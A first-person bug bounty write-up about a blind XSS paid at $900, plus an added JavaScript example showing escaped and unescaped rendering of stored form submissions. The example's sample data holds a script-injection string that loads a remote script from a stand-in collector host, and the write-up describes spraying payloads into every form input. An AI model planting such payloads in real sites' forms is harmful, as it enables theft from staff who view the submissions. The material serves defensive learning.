
$900 Blind XSS


Hello guys! This is my first-ever writeup. Today I will tell you about my first bug bounty earning.


It was a blind XSS (blind XSS are awesome 🔥).

First I went to Bugcrowd and started looking for a good program for me.
At that time I thought, why not choose an old program, because there are many hunters hunting on newly added programs.

So I went to bugcrowd.com/programs and clicked Last >>. Then I selected a program that has *.target.tld

I opened the homepage (redacted.com) and started looking for keywords like Contact Us, Customer Support, Help.
I found a "Get a demo" button; I clicked it and found that there is a form for demo slot booking.



I pasted my xsshunter basic payload into every input I saw.
After 10 to 15 hours, I got a mail from xsshunter; I received multiple fires from redacted.com.
I reported immediately and told them that some of their booking form inputs are not sanitized and are vulnerable to blind XSS.
I showed them the PoC, IPs, and other details.



After 4 days, they triaged it with P2 severity.
I was so happy, I couldn't believe it, because the program is one of the oldest programs on Bugcrowd.

After 2 days they rewarded me with $900 and 20 points.



I got mad that day; words can't describe that feeling.
Special thanks to all my mentors @thecyberzeel @AnubhavSingh_ @IAmMandatory and Bugcrowd.

Here is the tip: programs add new features from time to time and these are mostly vulnerable, so work on old programs too.


Timeline:
[19 Jun 2021] : Bug Submitted
[23 Jun 2021] : Accepted and Triaged as P2
[25 Jun 2021] : Rewarded $900
[23 Dec 2021] : Resolved
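
For the defender's side of the booking-form finding above, here is an added example (not from the original post or the affected program) of the back-office view where stored submissions get rendered, with the unescaped pattern next to an output-encoded one. The field names, the sample submission, the `collector.example` host and the CSP value are all constructed assumptions.

```javascript
// Added example: rendering stored demo-booking submissions in an internal tool.
// Blind XSS fires here, in the staff-facing view, not on the public form,
// so the encoding has to happen at this rendering step.

// Constructed sample: one booking as it might be stored after form submission.
const sampleBooking = {
  name: 'Alice Example',
  company: '"><script src="https://collector.example/probe.js"></script>',
  message: 'Need a demo <b>next week</b> & pricing',
};

// Unsafe pattern: stored values concatenated straight into the HTML.
function renderRowUnsafe(b) {
  return `<tr><td>${b.name}</td><td>${b.company}</td><td>${b.message}</td></tr>`;
}

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// Encode for an HTML text or quoted-attribute context; null/undefined become ''.
function escapeHtml(value) {
  return String(value ?? '').replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hardened pattern: every stored field is encoded at output time.
function renderRowSafe(b) {
  const cells = [b.name, b.company, b.message].map(escapeHtml);
  return `<tr><td>${cells.join('</td><td>')}</td></tr>`;
}

// Second layer for the internal tool: a CSP that only allows same-origin
// scripts, so markup that slips through cannot load a remote script.
function backOfficeCsp() {
  return "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";
}

// Review helper: does the rendered markup contain a live <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log('unsafe row has script tag:', containsScriptTag(renderRowUnsafe(sampleBooking)));
console.log('safe row has script tag:  ', containsScriptTag(renderRowSafe(sampleBooking)));
console.log('Content-Security-Policy:  ', backOfficeCsp());
```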